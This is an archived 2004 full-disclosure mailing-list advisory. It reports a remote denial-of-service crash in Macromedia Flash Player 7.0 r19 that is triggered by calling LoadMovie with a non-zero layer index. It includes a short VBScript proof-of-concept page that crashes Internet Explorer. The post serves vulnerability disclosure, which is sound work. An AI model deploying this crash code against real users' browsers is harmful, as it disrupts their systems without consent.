[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000901c41bb1$b9ebdba0$a85ab350@fucku>
Date: Tue, 6 Apr 2004 10:32:41 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "full-disclosure" <full-disclosure@...ts.netsys.com>,
"SecurITeam News" <news@...uriteam.com>,
"securitytracker" <bugs@...uritytracker.com>,
"bugtraq" <bugtraq@...urityfocus.com>
Subject: Macromedia Flash Player 7.0 r19 - Null Pointer Assignment(Remote Crash)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Macromedia Flash Player
Vendors: http://www.macromedia.com
Version: 7.0 r19
Platforms: WindowsXP Professional,SP1,SP2
Bug: Null Pointer Assignment
Risk: Medium - Denial Of Service
Exploitation: Remote with browser
Date: 1 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@...l.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Macromedia Flash Player is a module/plugin that comes by default with
windows installation.
It is widely used accross website all around the world. It is stable and its
designers took
made a few efforts to make it secure.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
Marcromedia Flash Player has a flaw at the "LoadMovie" function.
The function is designed the following way: LoadMovie(layer as long, url as
string).
This functions handles long strings, non-alphabetic chars and even an
overflow at high layer num.
The only thing it crashes upon is loading a flash movie into a non-zero
layer index.
This means that"
LoadMovie 1,"c6ool.swf"
Will Crash Internet Explorer Window because of a null pointer assignment by
the flash module.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<script language=vbscript>
Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1")
mymy2.LoadMovie 1,"c6ool.swf"
</script>
------------------- CUT HERE -------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Only the one who sees the invisible , Can do the Impossible."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists